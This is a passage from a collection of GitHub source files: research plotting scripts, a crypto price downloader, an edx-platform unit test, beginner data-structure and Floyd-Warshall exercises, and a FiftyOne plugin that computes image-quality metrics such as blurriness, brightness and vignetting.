'low-noise_7', 'low-noise_8', 'low-noise_9',\n\t'low-noise_10', 'low-noise_11', 'low-noise_12', 'low-noise_13', 'low-noise_14', 'low-noise_15', 'low-noise_16', \n 'low-noise_17', 'low-noise_18', 'low-noise_19', 'low-noise_20']\n\nbase_dir = os.getcwd()\nresults_dir = '/results/'\nireos_java_dir = 'ireos_java/'\nireos_dir = 'ireos/'\n\n# define algorithm of java implementation -> column name later\njava_predictors = ['Kernel Logistic Regression']\n\n# calculate mean and standard deviation for kernel logistic regression\nresult_java = []\nresult_java_std = []\nfor data_set in datasets:\n mean_ = pd.read_csv(base_dir + results_dir + ireos_java_dir + data_set + '.csv').to_numpy().mean()\n std_ = pd.read_csv(base_dir + results_dir + ireos_java_dir + data_set + '.csv').to_numpy().std()\n result_java = np.append(result_java, mean_)\n result_java_std = np.append(result_java_std, std_)\n \n \nfireos_predictors = ['Decision Tree', 'Random Forest', 'Support Vector Machine', 'LibLinear']\nfireos_suffixes = ['-decision_tree_native-nothing-false-sequential', '-random_forest_native-nothing-false-sequential'\n ,'-libsvm-parallel', '-liblinear-nothing-false-sequential']\n\nnum_predictors = len(fireos_suffixes)\nnum_datasets = len(datasets)\n\nresult_fireos = np.zeros((num_datasets, num_predictors))\nresult_fireos_std = np.zeros((num_datasets, num_predictors))\n\n# calculate mean and standard deviation for fireos predictors\nfor i in range(0, num_predictors):\n for j in range(0, num_datasets):\n mean_ = pd.read_csv(base_dir + results_dir + ireos_dir + datasets[j] + fireos_suffixes[i] + '.csv', header=0).to_numpy().mean()\n std_ = pd.read_csv(base_dir + results_dir + ireos_dir + datasets[j] + fireos_suffixes[i] + '.csv', header=0).to_numpy().std()\n result_fireos[j][i] = mean_\n result_fireos_std[j][i] = std_\n \n# concat java and fireos solutions\npredictors = np.append(java_predictors, fireos_predictors)\nresults = np.column_stack((result_java, result_fireos))\nstds = np.column_stack((result_java_std, result_fireos_std))\nstds_df = pd.DataFrame(stds, columns=predictors, index=datasets)\n\nresult_df = pd.DataFrame(results, columns=predictors, index=datasets)\nresult_df.index.name='Dataset'\n\nsns.set_style('darkgrid')\nfor predictor in predictors:\n 
ax = sns.lineplot(x=\"Dataset\", y=predictor, data=result_df, marker='o')\n ax.tick_params(axis='x', rotation=90)\n \nax.legend(predictors)\nplt.title('Separabilities of different predictors over different datasets')\nplt.ylabel('Separability')\nplt.show()","repo_name":"ExoFlare/pyIREOS","sub_path":"ireos_comparator2.py","file_name":"ireos_comparator2.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23513387481","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 12 21:10:57 2021\r\n\r\n@author: beile.yaaqob.aisin\r\n\"\"\"\r\n\r\nimport pandas_datareader as web\r\nimport pandas as pd\r\nimport datetime as dt\r\n\r\npath = 'C://Users/beile.yaaqob.aisin/Downloads/The_Reddit_Ethereum_Dataset/'\r\n\r\nstart = dt.datetime(2016,5,15) # arbitrary begining date of the last market cycle\r\nend = dt.datetime(2021,11,1) #end date of the eth reddit dataset\r\n\r\neth = web.DataReader('ETH-USD', 'yahoo', start, end)\r\nbtc = web.DataReader('BTC-USD', 'yahoo', start, end)\r\n\r\neth.to_csv(path+'eth_price.csv')\r\nbtc.to_csv(path+'btc_price.csv')","repo_name":"BYakovAisin/Reddit_Data_ETH_Price_Model","sub_path":"crypt_price_pddata.py","file_name":"crypt_price_pddata.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12614306343","text":"\"\"\"\nTest for the NotificationFilter class.\n\"\"\"\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport ddt\nfrom django.utils.timezone import now\n\nfrom common.djangoapps.course_modes.models import CourseMode\nfrom common.djangoapps.student.models import CourseEnrollment\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom openedx.core.djangoapps.content.course_overviews.models import CourseOverview\nfrom openedx.core.djangoapps.notifications.filters import NotificationFilter\nfrom openedx.features.course_duration_limits.models import CourseDurationLimitConfig\nfrom openedx.features.course_experience.tests.views.helpers import add_course_mode\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase\nfrom xmodule.modulestore.tests.factories import CourseFactory\n\n\n@ddt.ddt\nclass CourseExpirationTestCase(ModuleStoreTestCase):\n \"\"\"Tests to verify the get_user_course_expiration_date function is working correctly\"\"\"\n\n def setUp(self):\n super().setUp() # lint-amnesty, pylint: disable=super-with-arguments\n self.course = CourseFactory(\n start=now() - timedelta(weeks=10),\n )\n\n self.user = UserFactory()\n self.user_1 = UserFactory()\n\n # Make this a verified course, so we can test expiration date\n add_course_mode(self.course, mode_slug=CourseMode.AUDIT)\n add_course_mode(self.course)\n CourseEnrollment.enroll(self.user, self.course.id, CourseMode.AUDIT)\n expired_audit = CourseEnrollment.enroll(self.user, self.course.id, CourseMode.AUDIT)\n expired_audit.created = now() - timedelta(weeks=6)\n expired_audit.save()\n\n @mock.patch(\"openedx.core.djangoapps.course_date_signals.utils.get_course_run_details\")\n def test_audit_expired_filter(\n self,\n mock_get_course_run_details,\n ):\n \"\"\"\n Test if filter_audit_expired function is working correctly\n \"\"\"\n\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user_1.id], result)\n\n mock_get_course_run_details.return_value = {'weeks_to_complete': 7}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n\n CourseDurationLimitConfig.objects.create(\n enabled=True,\n course=CourseOverview.get_from_id(self.course.id),\n enabled_as_of=now(),\n )\n # weeks_to_complete is set to 4 because we want to test if CourseDurationLimitConfig is working correctly.\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n\n @mock.patch(\"openedx.core.djangoapps.course_date_signals.utils.get_course_run_details\")\n @mock.patch(\"openedx.core.djangoapps.notifications.filters.NotificationFilter.filter_audit_expired\")\n def test_apply_filter(\n self,\n mock_filter_audit_expired,\n mock_get_course_run_details,\n ):\n \"\"\"\n Test if apply_filter function is working correctly\n \"\"\"\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n mock_filter_audit_expired.return_value = [self.user.id, self.user_1.id]\n result = NotificationFilter().apply_filters(\n [self.user.id, self.user_1.id],\n self.course.id,\n 'new_comment_on_response'\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n 
mock_filter_audit_expired.assert_called_once()\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/notifications/tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"2546109852","text":"size = int(input(\"Enter size of the Linked List: \"))\n\nlinkedlist = [None for i in range(size)]\nlistpointers = [i + 1 for i in range(size + 2)]\nstartpointer = -1\nnull = -1\nheappointer = 0\noldindex = startpointer\ninitial_run = True\n\n\ndef add(x):\n global startpointer, heappointer, listpointers, initial_run\n if heappointer != null and heappointer != size:\n temp = startpointer\n startpointer = heappointer\n heappointer = listpointers[heappointer]\n linkedlist[startpointer] = x\n listpointers[startpointer] = temp\n if initial_run:\n listpointers[0], listpointers[-1] = null, null\n initial_run = False\n else:\n print(\"Linked List is Full - can't Insert\")\n\n\ndef remove(x):\n global startpointer, heappointer, oldindex\n if startpointer != null:\n index = startpointer\n while linkedlist[index] != x and index != null:\n oldindex = index\n index = listpointers[index]\n if index == null:\n print(x, \"not found\")\n else:\n linkedlist[index] = None\n temp = listpointers[index]\n listpointers[index] = heappointer\n heappointer = index\n listpointers[oldindex] = temp\n else:\n print(\"Linked List is Empty, can't Delete\")\n\n\ndef search(key):\n for n in range(len(linkedlist)):\n if linkedlist[n] == key:\n print('Found at position', n + 1)\n break\n else:\n print('Not found')\n\n\nwhile True:\n menu = int(input(f\"\"\"Choose an option:\n1. Add\n2. Delete\n3. Search\n4. Display\n5. Exit\n\nLinked List: {linkedlist}\nList Pointers: {listpointers}\n-> \"\"\"))\n if menu == 1:\n item = int(input(\"Enter item to be Inserted: \"))\n add(item)\n print(startpointer)\n print(heappointer)\n elif menu == 2:\n item = int(input(\"Enter item to be Deleted: \"))\n remove(item)\n print(startpointer)\n print(heappointer)\n elif menu == 3:\n value = int(input(\"Enter item to Search: \"))\n search(value)\n elif menu == 4:\n print(linkedlist)\n print(listpointers)\n elif menu == 5:\n break\n else:\n print(\"Enter a value between 1 - 4\")\n","repo_name":"AwabIsam/A-Level","sub_path":"Linked List(Array).py","file_name":"Linked List(Array).py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24499605969","text":"import Floyds\nimport sys\nimport time\n\n\nif __name__ == '__main__':\n \n graph = [[0, 7, Floyds.NO_PATH, 8],\n [Floyds.NO_PATH, 0, 5, Floyds.NO_PATH],\n [Floyds.NO_PATH, Floyds.NO_PATH, 0, 2],\n [Floyds.NO_PATH, Floyds.NO_PATH, Floyds.NO_PATH, 0]\n ]\n \n # create a working copy of the graph to pass to the function.\n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)\n \n # run each test 500 times in order to test performace differences\n \n #recursive_test\n started_at = time.time()\n for _ in range(75000):\n Floyds.floydWarshall(dist,0)\n \n recursive_time = time.time() - started_at\n \n print('It took the recursive function {}s to complete 75000 runs'.format(round(recursive_time,2)))\n \n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)\n \n #iterative_test\n started_at = time.time()\n for _ in range(75000):\n Floyds.floydWarshallIterative(dist)\n \n iterative_time = time.time() - started_at\n \n print('It took the iterative function {}s to complete 75000 runs'.format(round(iterative_time,2)))\n \n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)","repo_name":"Zunaira1989/FloydsAssignment","sub_path":"performancetest.py","file_name":"performancetest.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23910926442","text":"\"\"\"Common Issues plugin.\n\nThis plugin provides operators to compute common issues in image datasets.\nIt is open source, and is adapted heavily from leading open source projects\nlisted in the README.\n|\n\"\"\"\n\nimport numpy as np\n\n\nimport cv2\nfrom PIL import Image\n\n\nimport fiftyone as fo\nimport fiftyone.operators as foo\nfrom fiftyone.operators import types\nfrom fiftyone import ViewField as F\n\n\n######## HELPER FUNCTIONS ########\n\n\ndef get_filepath(sample):\n return (\n sample.local_path if hasattr(sample, \"local_path\") else sample.filepath\n )\n\n\ndef _crop_pillow_image(pillow_img, detection):\n img_w, img_h = pillow_img.width, pillow_img.height\n\n bounding_box = detection.bounding_box\n left, top, width, height = bounding_box\n left *= img_w\n top *= img_h\n right = left + width * img_w\n bottom = top + height * img_h\n\n return pillow_img.crop((left, top, right, bottom))\n\n\ndef _get_pillow_patch(sample, detection):\n img = Image.open(get_filepath(sample))\n return _crop_pillow_image(img, detection)\n\n\ndef _convert_pillow_to_opencv(pillow_img):\n # pylint: disable=no-member\n return cv2.cvtColor(np.array(pillow_img), cv2.COLOR_RGB2BGR)\n\n\ndef _convert_opencv_to_pillow(opencv_image):\n # pylint: disable=no-member\n return Image.fromarray(cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB))\n\n\ndef _get_opencv_grayscale_image(sample):\n # pylint: disable=no-member\n return cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n\n\n######## CONTEXT & INPUT MANAGEMENT ########\n\n\ndef _execution_mode(ctx, inputs):\n delegate = ctx.params.get(\"delegate\", False)\n\n if delegate:\n description = \"Uncheck this box to execute the operation immediately\"\n else:\n description = \"Check this box to delegate execution of this task\"\n\n inputs.bool(\n \"delegate\",\n default=False,\n required=True,\n label=\"Delegate execution?\",\n description=description,\n view=types.CheckboxView(),\n )\n\n if delegate:\n inputs.view(\n \"notice\",\n types.Notice(\n label=(\n \"You've chosen delegated execution. Note that you must \"\n \"have a delegated operation service running in order for \"\n \"this task to be processed. 
See \"\n \"https://docs.voxel51.com/plugins/index.html#operators \"\n \"for more information\"\n )\n ),\n )\n\n\ndef _list_target_views(ctx, inputs):\n has_view = ctx.view != ctx.dataset.view()\n has_selected = bool(ctx.selected)\n default_target = \"DATASET\"\n if has_view or has_selected:\n target_choices = types.RadioGroup()\n target_choices.add_choice(\n \"DATASET\",\n label=\"Entire dataset\",\n description=\"Run for the entire dataset\",\n )\n\n if has_view:\n target_choices.add_choice(\n \"CURRENT_VIEW\",\n label=\"Current view\",\n description=\"Run for the current view\",\n )\n default_target = \"CURRENT_VIEW\"\n\n if has_selected:\n target_choices.add_choice(\n \"SELECTED_SAMPLES\",\n label=\"Selected samples\",\n description=\"Run for the selected samples\",\n )\n default_target = \"SELECTED_SAMPLES\"\n\n inputs.enum(\n \"target\",\n target_choices.values(),\n default=default_target,\n view=target_choices,\n )\n else:\n ctx.params[\"target\"] = \"DATASET\"\n\n\ndef _get_target_view(ctx, target):\n if target == \"SELECTED_SAMPLES\":\n return ctx.view.select(ctx.selected)\n\n if target == \"DATASET\":\n return ctx.dataset\n\n return ctx.view\n\n\ndef _handle_patch_inputs(ctx, inputs):\n target_view = _get_target_view(ctx, ctx.params.get(\"target\", None))\n patch_types = (fo.Detection, fo.Detections, fo.Polyline, fo.Polylines)\n patches_fields = list(\n target_view.get_field_schema(embedded_doc_type=patch_types).keys()\n )\n\n if patches_fields:\n patches_field_choices = types.DropdownView()\n for field in sorted(patches_fields):\n patches_field_choices.add_choice(field, label=field)\n\n inputs.str(\n \"patches_field\",\n default=None,\n required=False,\n label=\"Patches field\",\n description=(\n \"An optional sample field defining image patches in each \"\n \"sample to run the computation on. 
If omitted, the full images \"\n \"will be used.\"\n ),\n view=patches_field_choices,\n )\n\n\n######## COMPUTATION FUNCTIONS ########\n\n#### ASPECT RATIO ####\ndef _compute_aspect_ratio(width, height):\n ratio = width / height\n return min(ratio, 1 / ratio)\n\n\ndef compute_sample_aspect_ratio(sample):\n width, height = sample.metadata.width, sample.metadata.height\n return _compute_aspect_ratio(width, height)\n\n\ndef compute_patch_aspect_ratio(sample, detection):\n img_width, img_height = sample.metadata.width, sample.metadata.height\n bbox_width, bbox_height = detection.bounding_box[2:]\n width, height = bbox_width * img_width, bbox_height * img_height\n return _compute_aspect_ratio(width, height)\n\n\n#### BLURRINESS ####\ndef _compute_blurriness(cv2_img):\n # pylint: disable=no-member\n gray = cv2.cvtColor(cv2_img, cv2.COLOR_BGR2GRAY)\n # pylint: disable=no-member\n laplacian = cv2.Laplacian(gray, cv2.CV_64F)\n variance = laplacian.var()\n return variance\n\n\ndef compute_sample_blurriness(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample))\n return _compute_blurriness(image)\n\n\ndef compute_patch_blurriness(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_blurriness(patch)\n\n\n#### BRIGHTNESS ####\ndef _compute_brightness(pillow_img):\n pixels = np.array(pillow_img)\n if pixels.ndim == 3 and pixels.shape[-1] == 3:\n r, g, b = pixels.mean(axis=(0, 1))\n else:\n mean = pixels.mean()\n r, g, b = (\n mean,\n mean,\n mean,\n )\n\n ## equation from here:\n ## https://www.nbdtech.com/Blog/archive/2008/04/27/calculating-the-perceived-brightness-of-a-color.aspx\n ## and here:\n ## https://github.com/cleanlab/cleanvision/blob/72a1535019fe7b4636d43a9ef4e8e0060b8d66ec/src/cleanvision/issue_managers/image_property.py#L95\n brightness = (\n np.sqrt(0.241 * r**2 + 0.691 * g**2 + 0.068 * b**2) / 255\n )\n return brightness\n\n\ndef compute_sample_brightness(sample):\n image = Image.open(get_filepath(sample))\n return _compute_brightness(image)\n\n\ndef compute_patch_brightness(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n return _compute_brightness(patch)\n\n\n#### CONTRAST ####\ndef _compute_contrast(cv2_image):\n # Calculate the histogram\n histogram, _ = np.histogram(cv2_image, bins=256, range=(0, 256))\n min_intensity = np.min(np.where(histogram > 0))\n max_intensity = np.max(np.where(histogram > 0))\n contrast_range = max_intensity - min_intensity\n return contrast_range\n\n\ndef compute_sample_contrast(sample):\n image = _get_opencv_grayscale_image(sample)\n return _compute_contrast(image)\n\n\ndef compute_patch_contrast(sample, detection):\n cv2_image = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(cv2_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_contrast(patch)\n\n\n#### ENTROPY ####\ndef _compute_entropy(pillow_img):\n return pillow_img.entropy()\n\n\ndef compute_sample_entropy(sample):\n image = Image.open(get_filepath(sample))\n return _compute_entropy(image)\n\n\ndef compute_patch_entropy(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n return _compute_entropy(patch)\n\n\n#### EXPOSURE ####\ndef _compute_exposure(opencv_gray_img):\n # pylint: disable=no-member\n histogram = cv2.calcHist([opencv_gray_img], [0], None, [256], [0, 256])\n normalized_histogram = histogram.ravel() / histogram.max()\n min_exposure = 
normalized_histogram[0]\n max_exposure = normalized_histogram[-1]\n return min_exposure, max_exposure\n\n\ndef compute_sample_exposure(sample):\n gray_img = _get_opencv_grayscale_image(sample)\n return _compute_exposure(gray_img)\n\n\ndef compute_patch_exposure(sample, detection):\n gray_img = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(gray_img)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_exposure(patch)\n\n\n#### SALT AND PEPPER ####\ndef _compute_salt_and_pepper(opencv_gray_img):\n SALT_THRESHOLD = 244\n PEPPER_THRESHOLD = 10\n\n # Identifying salt-and-pepper pixels\n salt_pixels = opencv_gray_img >= SALT_THRESHOLD\n pepper_pixels = opencv_gray_img <= PEPPER_THRESHOLD\n\n # Morphological operations to exclude larger contiguous regions\n kernel = np.ones((2, 2), np.uint8)\n\n # Dilate and then erode (Opening operation)\n # pylint: disable=no-member\n salt_opening = cv2.morphologyEx(\n salt_pixels.astype(np.uint8), cv2.MORPH_OPEN, kernel\n ) # pylint: disable=no-member\n pepper_opening = cv2.morphologyEx(\n pepper_pixels.astype(np.uint8), cv2.MORPH_OPEN, kernel\n )\n\n # Identify isolated salt and pepper pixels\n salt_isolated = salt_pixels & ~salt_opening\n pepper_isolated = pepper_pixels & ~pepper_opening\n\n # Calculate the percentage of isolated salt-and-pepper pixels\n total_isolated_salt_pepper_pixels = np.sum(salt_isolated) + np.sum(\n pepper_isolated\n )\n total_pixels = opencv_gray_img.size\n noise_percentage = total_isolated_salt_pepper_pixels / total_pixels * 100\n\n return noise_percentage\n\n\ndef compute_sample_salt_and_pepper(sample):\n gray_img = _get_opencv_grayscale_image(sample)\n return _compute_salt_and_pepper(gray_img)\n\n\ndef compute_patch_salt_and_pepper(sample, detection):\n gray_img = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(gray_img)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_salt_and_pepper(patch)\n\n\ndef _compute_saturation(open_cv_image):\n # pylint: disable=no-member\n hsv = cv2.cvtColor(open_cv_image, cv2.COLOR_BGR2HSV)\n saturation = hsv[:, :, 1]\n return np.mean(saturation)\n\n\ndef compute_sample_saturation(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample))\n return _compute_saturation(image)\n\n\ndef compute_patch_saturation(sample, detection):\n # pylint: disable=no-member\n opencv_image = cv2.imread(get_filepath(sample))\n pillow_image = _convert_opencv_to_pillow(opencv_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_saturation(patch)\n\n\n#### VIGNETTING ####\ndef _compute_vignetting(opencv_gray_img):\n # Get the image center\n size_y, size_x = np.array(opencv_gray_img).shape[:2]\n center_y, center_x = size_y / 2, size_x / 2\n\n # Calculate the maximum radius\n max_radius = np.min([center_x, center_y])\n\n # Create a meshgrid for calculating distances\n y, x = np.ogrid[\n -center_y : opencv_gray_img.shape[0] - center_y,\n -center_x : opencv_gray_img.shape[1] - center_x,\n ]\n distances = np.sqrt(x**2 + y**2)\n\n # Calculate the radial intensity profile\n radial_profile = []\n for r in range(int(max_radius)):\n mask = distances < r\n if np.any(mask):\n radial_profile.append(np.mean(opencv_gray_img[mask]))\n else:\n radial_profile.append(np.nan) # Append NaN if the mask is empty\n\n radial_profile = np.array(radial_profile)\n\n # 
Filter out NaN values before calculating the drop-off\n radial_profile = radial_profile[~np.isnan(radial_profile)]\n\n # Analyze the profile for a drop-off, if there are any values\n if len(radial_profile) > 0:\n drop_off_percentage = (\n (radial_profile[0] - radial_profile[-1]) / radial_profile[0] * 100\n )\n else:\n drop_off_percentage = np.nan\n\n return drop_off_percentage\n\n\ndef compute_sample_vignetting(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n return _compute_vignetting(image)\n\n\ndef compute_patch_vignetting(sample, detection):\n # pylint: disable=no-member\n gray_image = cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n pillow_image = _convert_opencv_to_pillow(gray_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_vignetting(patch)\n\n\n################################################################\n################################################################\n\nPROP_SAMPLE_COMPUTE_FUNCTIONS = {\n \"aspect_ratio\": compute_sample_aspect_ratio,\n \"blurriness\": compute_sample_blurriness,\n \"brightness\": compute_sample_brightness,\n \"contrast\": compute_sample_contrast,\n \"entropy\": compute_sample_entropy,\n \"exposure\": compute_sample_exposure,\n \"salt_and_pepper\": compute_sample_salt_and_pepper,\n \"saturation\": compute_sample_saturation,\n \"vignetting\": compute_sample_vignetting,\n}\n\n\nPROP_PATCH_COMPUTE_FUNCTIONS = {\n \"aspect_ratio\": compute_patch_aspect_ratio,\n \"blurriness\": compute_patch_blurriness,\n \"brightness\": compute_patch_brightness,\n \"contrast\": compute_patch_contrast,\n \"entropy\": compute_patch_entropy,\n \"exposure\": compute_patch_exposure,\n \"salt_and_pepper\": compute_patch_salt_and_pepper,\n \"saturation\": compute_patch_saturation,\n \"vignetting\": compute_patch_vignetting,\n}\n\n\ndef compute_dataset_property(property, dataset, view=None, patches_field=None):\n if view is None:\n view = dataset\n if patches_field is None:\n dataset.add_sample_field(property, fo.FloatField)\n for sample in view.iter_samples(autosave=True, progress=True):\n prop_value = PROP_SAMPLE_COMPUTE_FUNCTIONS[property](sample)\n if property == \"exposure\":\n sample[\"min_exposure\"] = prop_value[0]\n sample[\"max_exposure\"] = prop_value[1]\n else:\n sample[property] = prop_value\n else:\n for sample in view.iter_samples(autosave=True, progress=True):\n if sample[patches_field] is None:\n continue\n for detection in sample[patches_field].detections:\n prop_value = PROP_PATCH_COMPUTE_FUNCTIONS[property](\n sample, detection\n )\n if property == \"exposure\":\n detection[\"min_exposure\"] = prop_value[0]\n detection[\"max_exposure\"] = prop_value[1]\n else:\n detection[property] = prop_value\n dataset.add_dynamic_sample_fields()\n\n\n################################################################\n################################################################\n\n\n##### UNIFIED INTERFACE #####\ndef _handle_config(property_name):\n _config = foo.OperatorConfig(\n name=f\"compute_{property_name}\",\n label=f\"Common Issues: compute {property_name.replace('_', ' ')}\",\n dynamic=True,\n )\n _config.icon = \"/assets/icon.svg\"\n return _config\n\n\ndef _handle_inputs(ctx, property_name):\n inputs = types.Object()\n label = \"compute \" + property_name.replace(\"_\", \" \")\n inputs.message(label, label=label)\n _execution_mode(ctx, inputs)\n _list_target_views(ctx, inputs)\n _handle_patch_inputs(ctx, inputs)\n 
return types.Property(inputs)\n\n\ndef _handle_execution(ctx, property_name):\n view = _get_target_view(ctx, ctx.params[\"target\"])\n patches_field = ctx.params.get(\"patches_field\", None)\n compute_dataset_property(\n property_name, ctx.dataset, view=view, patches_field=patches_field\n )\n ctx.trigger(\"reload_dataset\")\n\n\ndef _handle_calling(\n uri, sample_collection, patches_field=None, delegate=False\n):\n ctx = dict(view=sample_collection.view())\n params = dict(\n target=\"CURRENT_VIEW\",\n patches_field=patches_field,\n delegate=delegate,\n )\n return foo.execute_operator(uri, ctx, params=params)\n\n\nclass ComputeAspectRatio(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"aspect_ratio\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"aspect_ratio\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"aspect_ratio\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeBlurriness(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"blurriness\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"blurriness\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"blurriness\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeBrightness(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"brightness\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"brightness\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"brightness\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeContrast(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"contrast\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"contrast\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"contrast\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeEntropy(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"entropy\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"entropy\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"entropy\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeExposure(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"exposure\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return 
_handle_inputs(ctx, \"exposure\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"exposure\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeSaltAndPepper(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"salt_and_pepper\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"salt_and_pepper\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"salt_and_pepper\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeSaturation(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"saturation\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"saturation\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"saturation\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeVignetting(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"vignetting\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"vignetting\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"vignetting\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\ndef _need_to_compute(dataset, field_name, patches_field=None):\n if patches_field is not None:\n i = 0\n sample = dataset.skip(i).first()\n while (\n \"detections\" not in sample[patches_field]\n or len(sample[patches_field].detections) == 0\n ):\n i += 1\n sample = dataset.skip(i).first()\n detection = sample[patches_field].detections[0]\n if field_name not in detection:\n return True\n else:\n return False\n else:\n if field_name in list(dataset.get_field_schema().keys()):\n return False\n else:\n return field_name not in dataset.first()\n\n\ndef _run_computation(dataset, issue_name, patches_field=None):\n 